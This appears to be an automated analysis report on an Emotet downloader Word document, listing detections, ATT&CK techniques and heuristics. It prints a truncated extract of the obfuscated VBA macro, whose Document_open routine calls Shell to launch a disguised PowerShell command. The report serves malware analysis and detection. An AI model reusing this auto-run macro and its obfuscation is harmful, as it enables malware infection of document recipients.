MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that utilizes the Shell() function, a common technique for executing arbitrary commands. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6877417-0', strongly suggesting the Emotet family. The macro's primary function appears to be downloading and executing a secondary payload, indicated by the Shell() call and the downloader heuristic.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6877417-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6877417-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15322 bytes |
SHA-256: 1c67c395c6b927153c0f02aa898ff4e7c1260d7f5ae3796f68a37f4ef70a52c0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KHGMqwXuW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fzWAb() On Error Resume Next uKVjjM = XrJVi - CqdIj / 19486 / wJLrnB - 223327908 + Hex(iriWKE) * tFqWj - Round(67114) cNuzwr = 87458 + wqqGp + (28519 * CDbl(FlCijU) - hihaAk / CSng(66292) - mnPLF / Hex(uoEZV) + 54267 - 10026) VsFXh = cwidq CziSNX = Sqr(21485) XamqL = zsdFB - tksNo / 22488 / iZKBZ - 223327908 + Hex(QAYoZq) * DUBSKz - Round(41891) dlwdv = 60101 + hfJmKi + (86604 * CDbl(lmlCb) - RawlR / CSng(49102) - amYtzp / Hex(HGNbBC) + 84441 - 2070) jiMGW = AIFJdN awriq = Sqr(43887) fNhkU = ATpQmw - zhvNsw / 90155 / FBPSrm - 223327908 + Hex(ZkMZF) * aImPql - Round(76694) stMZNL = 90139 + aDEPM + (6322 * CDbl(jaCpp) - XEMFY / CSng(89633) - LrGWT / Hex(Laotzn) + 51751 - 74125) GVzvAl = phiDX Rtjohj = Sqr(11361) doYESc = rnilaF - jXwmVc / 79620 / niAau - 223327908 + Hex(wjwTT) * fiQqs - Round(45947) aMSRc = 5756 + tFDMsw + (43031 * CDbl(JzBMH) - ziaiu / CSng(33663) - oIWou / Hex(AwTzN) + 66365 - 12039) IXonwU = lbpkL CTcuww = Sqr(75042) fzWAb = hCHkkPHlU + VBA.Shell(TjBqakLFsB + Chr(JwjUOhaSYO + vbKeyP + rawTkVihJ) + "owers" + jHDEhW + sSRbaB + FCvjPdP + kFCAo + CbmiaOwvIQu, 61718 - 61718) oRiwYm = MhstzA - BbzSO / 33081 / UuIWfk - 223327908 + Hex(CzRwj) * wSLMBP - Round(77589) mdAtD = 85278 + XtEmSH + (86143 * CDbl(wGHuz) - NqHhV / CSng(99604) - XtmkqJ / Hex(ChXnAp) + 82870 - 65523) bJfzf = GmEwLc tiYhp = Sqr(77392) cuoFkK = vFHKNY - DXpna / 95922 / kSYuG - 223327908 + Hex(EUaOM) * DuSsXL - Round(59648) UWWZt = 3589 + KkavQE + (36769 * CDbl(PlQwcZ) - mMfzw / CSng(44606) - WCWMhd / Hex(pnINJA) + 39784 - 63025) FHvrh = rCaPbX bdVIm = Sqr(79208) End Function Private Sub Document_open() On Error Resume Next uPLhYj = IMjwz - IcuBGt / 28770 / KwFpM - 223327908 + Hex(nvmhA) * DSlfun - Round(3497) sbQLdw = 80079 + iszjVi + (72130 * CDbl(SbvEwc) - inzkj / CSng(28123) - uAqMBq / Hex(LhjDld) + 20266 - 85870) MICqGI = XFfUMr mwlbNt = Sqr(32797) SoHFfz = MzioG - MbvjU / 15887 / oEqLE - 223327908 + Hex(mNdNi) * qbulub - Round(74135) ljQFr = 21835 + aNZCz + (27088 * CDbl(qqOHSs) - GmEtuc / CSng(63276) - DNaBh / Hex(iUaCc) + 63214 - 83965) uYtMv = iTrZHz zrPhwn = Sqr(55476) fzWAb uwHtN = BdjFL - YXEjj / 92096 / DDiBwC - 223327908 + Hex(cIUzMi) * sRDGq - Round(48932) GoOwwA = 12835 + wikEu + (30854 * CDbl(RqBFhX) - awwSU / CSng(2772) - zKMAOk / Hex(jmzbfZ) + 19599 - 60374) INFtsk = mPTAd owUoV = Sqr(48481) rwWPCi = TZwiIV - VYmaB / 8248 / dqPraZ - 223327908 + Hex(sBOMl) * LLwfAz - Round(36777) kVOQuJ = 82646 + mtJjs + (62603 * CDbl(fFAapW) - Sjjbj / CSng(88531) - iYCKUu / Hex(dAJzz) + 13828 - 56764) lTvaO = HwkRo KOihfb = Sqr(86695) End Sub Attribute VB_Name = "XCcVWDsKvFZos" Function jHDEhW() On Error Resume Next ljTIm = nJcBTE qowAOw = Sqr(60585) ozKROW = 87561 + wqiMl + (63483 * CDbl(dQTHka) - UYQcl / CSng(24951) - iLzfC / Hex(hIbWQ) + 3693 - 14402) iLTPU = lBmkjE - ifhjJ / 14348 / owriT - 223327908 + Hex(ikTbWO) * SdnLm - Round(5865) zLEwdnnPQ = "HeLL" + " .( $VeRB" + "OsePrE" + "FEr" + "ENCE.tO" XakfV = ULJOR VsZRD = Sqr(37830) rKXlT = 70650 + oBBhKO + (35158 * CDbl(ABrVwG) - zNMMN / CSng(32080) - TaEKR / Hex(LvsUb) + 81937 - 27925) KStUz = MJZHXf - iacAzv / 45129 / JXuGr - 223327908 + Hex(bUmuK) * rIILpR - Round(71876) kvFPlfXap = "St" + "rIn" + "G()[1,3]+'x" + "'-" + "joIn'') " + "( -jOIn ([ch" + "AR[]]" + "(2, 104 ,126, " lSMDLl = vQYUH zqcztc = Sqr(98339) PAvzOH = 63198 + omMNil + (48307 * CDbl(RKfJY) - qKqvG / CSng(73389) - ENaCAb / Hex(NMbJE) + 26355 - 92923) ozXvK = ITBuEk - lKhKQ / 9985 / jVFLX - 223327908 + Hex(KzSGs) * FzlEd - Round(61846) FLWMoOwpsi = "81" + " , 96 , 81,6" + "8 , 6, 27 ,6" + " ,72 , " + "67, 81 ,11 ," + " 73 , " + "68 , " + "76, " + "67,69, 82, " + "6 , 84,71 ," cDIIJJ = INjup NHJhj = Sqr(26569) XuiTsM = 46193 + ZIAvC + (44 * CDbl(YAGEiS) - BbNvBL / ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.